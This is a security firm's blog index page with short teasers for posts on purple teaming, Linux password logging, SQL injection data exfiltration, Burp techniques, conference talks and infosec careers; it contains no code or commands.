Blog

On Purple

By Tim Medin | July 12, 2019

The “Purple Team” term has been flying around for a while now and it is an important development in our growth as an industry. If you haven’t heard the term […]

Learn More
On Purple

Logging Passwords on Linux

By Tim Medin | May 30, 2019

Hal Pomeranz tipped me off to a nasty little trick of using Linux’s own auditing features and PAM to grab clear text passwords from users as they use sudo/su on […]

Learn More
Logging Passwords on Linux

Red Siege Welcomes Corey Overstreet

By Red Siege | May 23, 2019

Overstreet is an experienced penetration tester and red team operator and has been engaged with Fortune 500 organizations across a variety of industries, including financial services, government services, and healthcare. […]

Learn More
Red Siege Welcomes Corey Overstreet

Breaking into Infosec

By Mike Saunders | May 7, 2019

tl/dr; There are a lot of ways to get into infosec. I’ll try to outline some of the things that have helped me along the way and provide some resources […]

Learn More
Breaking into Infosec

Finding the silver lining in getting your teeth kicked in

By Mike Saunders | March 27, 2019

Lots of pen test and red team blogs follow the same model: we came, we saw, we conquered, blue team tears flowed. This is not one of those blogs. TL/DR; […]

Learn More
Finding the silver lining in getting your teeth kicked in

SQLi Data Exfiltration via DNS

By Mike Saunders | November 30, 2018

Did you know you can use DNS queries to exfiltrate data from a database via SQLi? No? Then continue reading! I’ll walk through some techniques you can use to enumerate […]

Learn More
SQLi Data Exfiltration via DNS

DerbyCon 8 – Web App 101: Getting the Lay of the Land

By Red Siege | October 5, 2018

Mike Saunders will be presenting “Web App 101: Lay of the Land” at DerbyCon 8, Saturday, October 6 at 12:00 PM, in Track 2 (upstairs). Mike draws on his experience […]

Learn More
DerbyCon 8 – Web App 101: Getting the Lay of the Land

Maintaining Session States in .NET Apps With Burp

By Mike Saunders | September 21, 2018

During a recent web app test, I encountered a situation when I would be randomly logged out of the application when running sqlmap. I wasn’t manipulating any of the session […]

Learn More
Maintaining Session States in .NET Apps With Burp

Capturing SQL Server User Hash with SQLi

By Mike Saunders | September 5, 2018

On a recent external web app pen test, I found a possible SQL injection vulnerability using the Burp Scanner. One of the tests triggered an A record lookup for the […]

Learn More
Capturing SQL Server User Hash with SQLi

Getting a Handle on Large Parameter Sets

By Mike Saunders | July 19, 2018

During a recent web app engagement, I wanted to run some of the Burp Scanner automated checks, but I was confronted with several issues. First, this particular application did not […]

Learn More
Getting a Handle on Large Parameter Sets